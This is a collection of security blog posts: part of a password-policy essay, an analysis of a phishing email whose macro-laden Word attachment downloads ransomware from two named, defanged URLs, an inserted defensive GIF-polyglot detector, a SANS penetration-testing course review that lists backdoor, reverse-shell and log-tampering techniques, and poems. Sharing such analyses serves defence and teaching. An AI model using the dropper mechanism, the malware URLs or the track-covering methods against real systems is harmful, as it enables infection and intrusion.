Practical password security depends on the availability of password management and enforcement mechanisms. Any password policy must on one hand balance the benefits of protection and enforcement and on the other minimize user impact. Without maintaining this careful balance, we run the risk of users coming to view policy mandates such as expiring passwords as tyrannical decrees that should be cleverly circumvented.

If a good personal and corporate security strategy depends on strong passwords—and few will argue that it does not—then the keystone of good password security is the establishment of an enterprise-wide solution that will either completely eliminate passwords or facilitate the management of the entire password life cycle via on-line, mobile, and off-line access.

Or as Milton Waddams would say, “Well, Ok. But… that’s the last straw. And, and I’m telling you It’s not okay because if they lock me out again and force me to memorize another complex password, I’m I’ll, I’ll, set the building on fire…”


Notes and References
Authentication in Internet Banking: A Lesson in Risk Management – FDIC (2007)
Uncovering Password Habits – Are Users’ Password Security Habits Improving?
The death of passwords is premature – Keeper (2016)
Microsoft admits expiring-password rules are useless – CNet (2019)

[1] Due to the sensitive nature of password surveys, password storage searches should be planned and executed carefully and discreetly. Before conducting any searches, you should secure written approval from your IT, InfoSec, HR, and legal teams. You should also coordinate all such activities with the local facilities team. Another good rule of thumb is to conduct all surveys with a team composed of representatives from HR and building security; this will eliminate the perception that some unknown individual is pillaging and violating the privacy of employees after hours. Follow-up conversations with users regarding their password storage and recovery habits should be done in a private setting in a non-threatening, non-confrontational manner. You should make it clear to the interviewee that their cooperation is appreciated, that this will not reflect poorly on their evaluation, and that the ultimate goal of the exercise is to improve both personal and corporate data security and privacy. A $20 gift certificate to Starbucks or another popular outlet would go a long way towards easing the tension.

[2] C. Coombs, R. Dawes, and A. Tversky, Mathematical Psychology: An Elementary Introduction. Prentice-Hall Press, 1970. Also Yan, Blackwell, Anderson, and Grant, “The Memorability and Security of Passwords: Some Empirical Results”, research paper, Cambridge University Computer Laboratory, 2001. Also G. A. Miller, “The magical number seven, plus or minus two: Some limits on our capacity for processing information”, Psychological Review, 63, 81-97, 1956.

[3] Schneier on Security, “Write Down Your Password” (2005)

[4] Spafford, Eugene H. (1992). “Observations on Reusable Password Choices”, Proceedings of the 3rd Security Symposium, USENIX, September.


© Copyright 2019 Yaacov Apelbaum, All Rights Reserved.

Good day to you!

Khoroshiy den' dlya tebya!

The other day, I got this cryptic email. It read:

– – – – – – – – – – – – – – – –
From: Wayne Millbrand <waynem@icon.co.za>
Date: 03/27/2017 2:23 PM (GMT-05:00)
To: ***
Subject: ***

Good day to you!

I have a rather delicate issue, which touches directly to you. Don’t be surprised how do I learned about you! The fact is that I have got already a second letter from the person, I do not know which asserts that you are fraud involved. He insists, that you forced him transfer funds on your PayPal account under fictional reason. However,with this information he pointed out your private data up to address:

First Last Name
Street Address
Town
State (with capitalization error)
Zip Code

Now he is collecting information and planing to contact the police. I advise you to view the information that he sent to me. I have attached Fine.doc with a copy of all of his messages.

Document was password-protected – 4299
Please explain to me what’s happening.  I hope that all of this is a silly misunderstanding.

Best regards,

Wayne Millbrand
– – – – – – – – – – – – – – – –

Based on the fake email address and the tell-tale Anguished English, I concluded that this was just another phish. I usually delete these emails promptly, but this one had an interesting component to it: it came with a password-protected MS Word document. This is somewhat unusual, because phishers typically expect you to just launch the attachment and activate the payload immediately.

So it appears that the attack strategy was to:

  1. Send a threatening email
  2. Add some publicly available information about the recipient to make it look genuine
  3. Encrypt the document in order to hide the payload from an anti-virus scanner
  4. Provide the password in the email to allow the user to open and decrypt the file
  5. Activate the payload in the MS Word document and infect the user’s machine

Based on the version of the MS Word attachment, I set up a Windows 7 virtual environment in a sandbox. I also installed Microsoft Office 2016 in order to debug the payload macro, the following Sysinternals utilities: ProcessMon, DiskMon, and DebugView, and Wireshark to sniff the TCP traffic.

I launched the document and entered the provided password. Inside the decrypted file, I found the following API declarations, variable names, and code:

Shell32.dll   ShellExecuteA
Kernel32      GetTempPathA
Kernel32      GetTempFileNameA
URLMon        URLDownloadToFileA

Dim wyqud As String
Dim zdwie As Long
Dim rufhd As Long
Dim bldos As Integer
Dim mufid() As Byte
Dim kmvbf As Long
Dim dfety As Long
Dim bvjwi As Long
Dim wbdys As Long
Dim dvywi(256) As Byte
Dim wdals As Long
Dim dwiqh As Long

Image: API declarations and variables (document-open routine and functions)

The attack mechanism seems to be a variation on an old theme: as soon as the user opens the file, the routine downloads a file from one of these two sources, the second serving as a backup:

h t t p://adenzia.ch/_vti_cnf/bug.gif
h t t p://kingofstreets.de/class/meq.gif

The macro is quite sophisticated; it can even prompt the user to disable their firewall if the download fails. Both GIFs, “bug.gif” and “meq.gif”—despite having an appropriate header block and some image content bytes—actually carry the encoded malware.

The macro uses a subroutine to extract the executable binary from the downloaded GIF. It stores the binary in a temp file, appends an “exe” extension to it, and then, using the Shell32 function ShellExecuteA, executes it in order to install additional malware. In this case, it was ransomware that encrypted the Documents folder.
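A defender-side check for the GIF trick described above, added here as an example and not code from the original post: it walks the GIF block structure to find where the image really ends, flags any bytes appended after the trailer, and looks for an embedded DOS/PE header. Both sample files are constructed inline; the appended “executable” is an 88-byte stub carrying only the MZ and PE signatures, not a real binary.

```python
import struct

GIF_SIGNATURES = (b"GIF87a", b"GIF89a")


class GifParseError(ValueError):
    """Raised when the byte stream does not follow the GIF block grammar."""


def _skip_sub_blocks(data, pos):
    # GIF data sub-blocks: a length byte followed by that many bytes; 0 ends the chain.
    while True:
        if pos >= len(data):
            raise GifParseError("truncated sub-block chain")
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n


def gif_payload_end(data):
    """Return the offset just past the 0x3B trailer, i.e. where a legitimate GIF ends."""
    if len(data) < 13 or data[:6] not in GIF_SIGNATURES:
        raise GifParseError("missing GIF signature")
    packed = data[10]                      # logical screen descriptor flags
    pos = 13
    if packed & 0x80:                      # global color table: 2^(N+1) RGB entries
        pos += 3 * (2 << (packed & 0x07))
    while True:
        if pos >= len(data):
            raise GifParseError("no trailer before end of file")
        block = data[pos]
        pos += 1
        if block == 0x3B:                  # trailer
            return pos
        if block == 0x21:                  # extension: label byte, then sub-blocks
            pos = _skip_sub_blocks(data, pos + 1)
        elif block == 0x2C:                # image descriptor (9 bytes incl. flags)
            if pos + 9 > len(data):
                raise GifParseError("truncated image descriptor")
            lpacked = data[pos + 8]
            pos += 9
            if lpacked & 0x80:             # local color table
                pos += 3 * (2 << (lpacked & 0x07))
            pos += 1                       # LZW minimum code size
            pos = _skip_sub_blocks(data, pos)
        else:
            raise GifParseError("unknown block type 0x%02x at %d" % (block, pos - 1))


def has_pe_signature(blob):
    """True if blob starts with a DOS 'MZ' header whose e_lfanew points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def inspect_gif(data):
    """Classify a file that claims to be a GIF; returns the individual findings."""
    result = {"valid_gif": False, "trailing_bytes": 0, "trailing_pe": False, "pe_anywhere": False}
    try:
        end = gif_payload_end(data)
        result["valid_gif"] = True
        trailing = data[end:]              # anything after the trailer is not image data
        result["trailing_bytes"] = len(trailing)
        result["trailing_pe"] = has_pe_signature(trailing)
    except GifParseError:
        pass
    # A dropper may hide the executable behind an offset, so also scan every 'MZ' in the file.
    mz = data.find(b"MZ")
    while mz != -1 and not result["pe_anywhere"]:
        result["pe_anywhere"] = has_pe_signature(data[mz:])
        mz = data.find(b"MZ", mz + 1)
    result["suspicious"] = result["trailing_bytes"] > 0 or result["pe_anywhere"]
    return result


# Constructed samples: a valid 1x1 pixel GIF, and the same GIF with a fake PE stub appended.
CLEAN_GIF = (b"GIF89a" + b"\x01\x00\x01\x00" + b"\x80\x00\x00" + b"\x00\x00\x00\xff\xff\xff"
             + b"\x21\xf9\x04\x01\x00\x00\x00\x00"
             + b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00" + b"\x02\x02\x44\x01\x00" + b"\x3b")
FAKE_PE = bytearray(b"MZ" + b"\x00" * 62)           # DOS header with e_lfanew = 64
struct.pack_into("<I", FAKE_PE, 0x3C, 64)
FAKE_PE += b"PE\0\0" + b"\x4c\x01" + b"\x00" * 18   # PE signature + i386 machine, rest zeroed
POLYGLOT_GIF = CLEAN_GIF + bytes(FAKE_PE)
```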

Image 1: The ransomware after installation

Interestingly, the first compromised URL used for the malware distribution was a website belonging to a company called Adenzia, a Swiss accounting and corporate services firm that ironically advertises itself as providing “Privacy and secure data storage” and:

  •   Accounting services
  •   Secure financial services
  •   Data entry from paper to digital
  •   Scanning paper data to digital
  •   Archiving data anonymously

Image 2: The Adenzia.ch website used for malware distribution

Image 3: The Kingofstreets.de website used for malware distribution

Another noteworthy strategy is that both the repurposed Swiss Adenzia.ch financial site and the second German kingofstreets.de gaming site required a login. This provided the attacker with an additional layer of protection by preventing internet security scanners from tracking down the payload by simply following a link to the malware.

Image 4: Malware distribution site login prompt

From the variable naming convention and the language of the email itself, it seems that the writer is a non-native English speaker from the FSU (former Soviet Union). The metadata from the Word document further supports this and suggests a strong link to a Russian origin. First, the author’s name was preserved as виньда (Vinda) and the company name came up as SPecialiST RePack.

SPecialiST RePack Metadata

SPecialiST RePack is a Russian digital publisher that repackages software. According to the Emsisoft malware database, they are a source of a large number of infected files and products.

Image 6: Samples of SPecialiST RePack infected content

As for the unfortunate Adenzia.ch site, it seems that it was breached in the past few months, as the Wayback Machine still shows it operational on October 4, 2016.

Image 7: The office address of Adenzia in Lugano, Switzerland

I’ve contacted Giovanni De Martin Cavan, the registered owner of Adenzia (who seems to have a strange history of forming companies and abandoning their websites), via email and gave him a heads-up that he needs to have a look at his website and corporate network. As of this date, I haven’t heard back from him. This could be an indication that either the site was a front for malware distribution from the get-go or else it is no longer in business and has been abandoned.


© Copyright 2017 Yaacov Apelbaum, All Rights Reserved.

Capturing the Flag

Image: Who Knows What Evil Lurks in the Heart of a Cyber Attacker

If you are a typical cyber security practitioner, you most likely catch up on the latest developments by visiting on-line sites like News Now and by periodically attending various vendor workshops. For the majority of InfoSec managers, the daily work grind and work/life balance challenges diminish the prospects of going back to school and plowing through hands-on, in-depth training.

Over the past two decades, the corporate cursus honorum for IT management has been the much-coveted MBA degree. In a large number of Fortune X00s, having an MBA from a top school was considered a prerequisite for an executive promotion. An MBA attested that an individual possessed all the current business acumen and the polish needed to take on any future corporate responsibility; it was the ultimate professional endorsement of merit.

This trend—other than having the end result of a glut of MBAs on the market—has also resulted in a shortage of highly technical cyber security managers. Consider some of the wholesale data breaches in some of the largest US retailers for 2014 alone. Check out the biographical backgrounds of some of the CISOs of the impacted companies. Not surprisingly, you will find no shortage of MBAs from top tier schools. What appears to be missing are individuals with vocational specializations in information and cyber security, and I’m not referring to rank and file CISSPs.

Of course, a common counter argument to this is that as a manager you are not supposed to know the ‘nitty gritty’ details of every technology in your corporate inventory and instead are expected to delegate to and draw on the expertise of others.

I don’t think that this is the case. Cyber security, unlike databases, BI, or ecommerce, is almost entirely a low-level technical play, and as such, a security manager should not have any gaping holes in his knowledge or overly rely on subordinates to make sense of risks, threats, and countermeasures. It would be unacceptable for an airline pilot to have gaping holes in his knowledge of flight operations and to delegate the actual flying to the cabin crew.

I’ve recently had a chance to witness just how limited classical enterprise defenses have become. This is especially true when it comes to Advanced Persistent Threats. In one incident that eventually became the catalyst for me going back to school, I witnessed how one cyber attacker managed within minutes to defeat all of the traditional enterprise defenses and countermeasures without even breaking a sweat. Amazingly, even after the debriefing and root cause analysis, the security team was no closer to understanding how a properly configured and maintained brand-name firewall and an IDS/IDPS failed to stop the attack, let alone even detect it.

If you are thinking that this couldn’t happen to you, think again. In the incident that I just described, all target boxes were patched, there were strict access control measures in place, the network was subnetted, and there were effective audit and password management systems in place.

After recovering from my momentary shock, I had an epiphany and realized that I urgently needed to re-hone my skills. I’ve heard about the SANS Institute from a number of colleagues and after checking it out, I decided to enroll in their Penetration Tester program. After juggling my bank account, my work schedule, and their course availability, I selected the following four courses:

  1. SEC504 Hacker Techniques Exploits & Incident Handling
  2. SEC560 Network Penetration Testing and Ethical Hacking
  3. SEC575 Mobile Device Security and Ethical Hacking
  4. SEC617 Wireless Ethical Hacking, Penetration Testing, and Defenses

SANS course tuition is on the expensive side, ranging from $6000-$9000 USD. Add travel and accommodations and you are looking at about $12K per class. Each course is delivered in about a week (40-60 hours of classroom activity). Classes are divided into lectures and hands-on labs with heavy emphasis on getting down and dirty.

Though it took me several months to complete the coursework, I found the whole experience to be uplifting. In addition to getting access to practical, real-world expertise from some of the world’s best penetration testers, we practiced the gray art of performing detailed reconnaissance on would-be targets, including mining social media and infrastructure data from blogs, forums, search engines, social networking sites, and other Internet resources.

In each course, we used the latest cutting-edge attack tools as well as the traditional low budget techniques that are still quite prevalent. The aim of the course was to push the envelope in each domain and not to merely teach a handful of hacks and tricks. Another great component was exploring various administrative questions such as legal issues associated with responding to computer attacks, employee monitoring, working with law enforcement, and the collection and handling of evidence.

Image: SANS Capture the Flag, Las Vegas 2015

When it came to performing the actual exploit, we got to use the best tools on the market. This included both COTS components and custom-written utilities and scripts. In each class we learned dozens of methods for exploiting target systems and how to gain access to the systems post-exploitation. Just to illustrate the extensive hands-on approach that SANS adopted in teaching Penetration Testing, here is a list of tools and techniques that we used in just the SEC504 course:

– Rootkits and detection
– Hidden file detection with LADS
– HTTP Reverse Shells using Base64
– InSSIDer for Wireless LAN discovery
– Nmap Port Scanner and Operating System fingerprinting tool
– Nessus Vulnerability Scanner
– Windows Command Line Kung-Fu for extracting Windows data through SMB sessions
– Sniffers, including Tcpdump
– Sniffer detection tools, including ifconfig, ifstatus, and promiscdetect
– Netcat for transferring files, creating backdoors, and setting up relays
– Metasploit, Metasploit, Metasploit... lots of Metasploit
– ARP and MAC analysis for ARP cache poisoning attack detection
– Password cracking
– Cross-site scripting and SQL injection web application attacks
– Intercepting and forging session cookies
– Detecting and executing DoS attack techniques
– Detecting backdoors with Netstat, lsof
– Covert channels using Covert TCP
– Clandestine network scanning and mapping
– Exploitation using built-in OS commands
– Privilege escalation
– Advanced pivoting techniques

The great thing about the SANS curriculum is that they go pretty far down the rabbit hole. A few of the classes required hard-core coding skills (you get to write and execute some buffer overflows). Other classes were procedural and got down to the wire in terms of the inner workings of RFCs and protocols. For example, in Wireless Ethical Hacking we had comprehensive coverage of WiFi, cordless telephones, smart devices, embedded home devices, mesh technologies like ZigBee and Z-Wave, Bluetooth, DECT, and NFC.

In Mobile Device Security we practiced reverse-engineering iOS binaries in Objective-C, reverse-engineering Android binaries in Java and Dalvik bytecode, evaluating mobile malware threats through source-code analysis, defeating Apple FairPlay encryption for application binary access, and overcoming anti-decompilation techniques.

Image: SANS Capture the Flag, Washington DC 2015

The participants in the classes came from diverse backgrounds, including three-letter agencies, LEA incident handling team members, and security administrators. The classes are well suited for anyone with a good command of TCP/IP and networking, and they would also benefit architects and technical leads involved in security operations and R&D.

The delivery of the material is completely immersive. You go from 0-90 in one second. Each course is equivalent to a traditional graduate semester course of 4 credits, so we had to complete an average of one textbook per day. At times, you feel like you are drinking and showering from a fire hose.

Taking good notes and hitting the books at night will help you stay afloat. It goes without saying that the instructors were outstanding; they offered unlimited tutoring and were always available—even during lunch and after hours—to help answer questions and work through the practice labs.

Images: SANS SEC504, SEC560, SEC575 and SEC617

Several interesting sessions in each class revolved around learning how to avoid being caught through various tactics and strategies for covering your tracks, such as file and directory camouflage, piggybacking on existing user Internet sessions to avoid detection, event log tampering and pruning, and performing memory cleanups.

For me, the best part of each course was the final session, called “Capture the Flag”. There, in a culmination of all of the hard work, we got to practice everything we had learned over the previous week. Each class had different parameters for capturing the flag, but they tended to follow the same patterns.

We needed to do some reconnaissance, reconstruct the network layout of our target, map our victim’s equipment and software inventory, and then proceed to execute the attacks. Once you breached the target, you would perform some additional exploits and start pivoting between hosts and “living off the land”. The overall objective of this exercise was to collect flags that had been placed in various locations on the victim’s network by the instructor. Some of these flags contained encrypted files or messages that we needed to decrypt and use as clues for other attacks; others involved passwords that were being sent over VOIP, in-memory session information, or data hidden in binaries.

Image: SANS Capture the Flag, Boston 2015

The capture the flag event usually lasts a full day and ends when one team successfully recovers all flags. At that point, the competition is stopped, the results are verified, and the winners are awarded the coveted challenge coins.

Image: SANS SEC575, SEC617 and SEC560 Capture the Flag tokens

If you are a computer security practitioner, I highly recommend that you take all four courses. Even if you can only afford one, go for it. It will change your perspective on pen testing forever and help you take a proactive role in keeping your company safe and out of the negative limelight.

Performing a good penetration test is much more than just hiring some outside help and rubber-stamping an audit. Verifying the integrity of your corporate security takes more than kicking the tires and lifting the hood these days. Anyone can throw a bunch of attacks against an organization and regurgitate the output of some automated tools in hundreds of pages of reports.

Participating in hands-on, structured training will help you avoid this trap and allow you to fully grasp your company’s real security needs, so that you can prioritize and formulate the most appropriate plan of action in the most cost-effective and timely manner.

Going through the meat grinder, you get to witness first hand the process of hot dog making. It’s not a pretty sight, but it’s an informative one. One of my most profound takeaways from this whole experience was answering the existential question of the spoon. Yes, the spoon does exist, but only for the end-user, sysadmin, DBA, and auditors. There is no spoon if you are a proficient attacker. With the right strategy and tools, concepts such as access control, event log integrity, and passwords are meaningless and are but chaff before the wind.

Image: There is no Spoon

I keep my three hard-earned challenge coins on my office bookshelf as a reminder that there is likely someone out there right now who is targeting my network through some kind of a clever attack. He/she has all the right tools and resources and is as determined and hard working as I was to get those coins.

And as far as my earlier MBA comment is concerned, if you are curious to know just how many managers attended the classes, the answer is just one. None of the 20-40 participants in each class had managerial responsibility. In fact, most of the folks I spoke to were surprised that a CTO would take time from his schedule and opt to get his hands dirty instead of just delegating this to one of his direct reports.

After all, ‘Isn’t that what a manager is supposed to do?’

© Copyright 2015 Yaacov Apelbaum All Rights Reserved.

Cyber Security Poetry

Image: Cyber Beatnik Poetry

Tokens of Distrust
It was on a starless March night,
The spear phishers went out for a bite.

Through a zero day vulnerability,
They breached RSA’s network security.

A Trojan attached to an email transmission,
Gave the attackers remote access permission. 

Deep into the corporate systems they dove, 
Collecting the SecurID key seeds treasure trove.

The theft affected over forty million tokens,
Transparency failed and trust was broken.

A few weeks followed and on a moonless May night,
The spear phishers returned with a renewed appetite.

Over the internet via secure VPN and a forged key,
They breached Lockheed’s defenses and pwned their IP.


Ties That Bind
Identity, how do I bind thee to an object? Let me recount the ways. 
One, by a secret.
Two, by a token.
Three, by your essence.
Four, by space and time.


Risk Appetite
A little shiftless fella named Phil,
Landed a CISO gig through a shady deal. 

Clueless about cyber security threats,
He managed his way upwards like a rat.

Pen tests and remediation took a back seat,
To what the cafeteria was serving to eat.


When the company was finally breached by a hack,
He said “C’est la vie! The insurance will cover our back.”